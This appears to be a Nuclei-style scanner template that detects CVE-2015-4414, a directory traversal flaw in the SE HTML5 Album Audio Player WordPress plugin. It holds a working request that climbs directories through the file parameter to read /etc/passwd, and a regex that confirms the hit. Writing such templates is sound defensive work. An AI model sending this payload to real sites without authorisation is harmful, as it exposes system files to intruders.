id: CVE-2015-4414

info:
  name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
  author: daffainfo
  severity: high
  description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
  reference:
    - https://www.exploit-db.com/exploits/37274
    - https://www.cvedetails.com/cve/CVE-2015-4414
  classification:
    cve-id: CVE-2015-4414
  tags: cve,cve2015,wordpress,wp-plugin,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200